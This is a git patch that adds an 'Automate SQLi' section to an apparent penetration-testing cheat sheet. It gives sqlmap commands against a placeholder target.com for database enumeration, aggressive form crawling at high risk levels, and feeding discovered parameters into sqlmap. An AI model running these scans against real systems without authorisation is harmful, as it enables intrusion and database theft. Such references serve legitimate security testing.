From ae0bf90e3257644e6390a8e8548607cb91f55d8c Mon Sep 17 00:00:00 2001
From: Mehdi <pentest.co@gmail.com>
Date: Thu, 13 Jun 2024 12:52:05 +0330
Subject: [PATCH] Update SQL Injection.md

---
 SQL Injection.md | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/SQL Injection.md b/SQL Injection.md
index 5b66faa..99b476a 100644
--- a/SQL Injection.md	
+++ b/SQL Injection.md	
@@ -2555,7 +2555,20 @@ AND false	False
 ```
 
 
-
+## Automate SQLi
+```bash
+# sqlmap
+sqlmap -u target.com/test?id=10 -p id --random-agent --dbs
+
+# sqlmap is test all forms in target and answered the wizard questios to default
+sqlmap -u target.com --forms --batch --crawl=10 --threads=10 --level=5 --risk=3
+
+# find all parameters on target and send to sqlmap
+python3 paramspider.py -d target.com -s TRUE -e woff,ttf,eot,svg | deduplicate --sort | sed '1,4d' | sqlmap
+
+# you can use sqlmap + burp --> burp extension sqlipy (integrated by sqlmap)
+
+```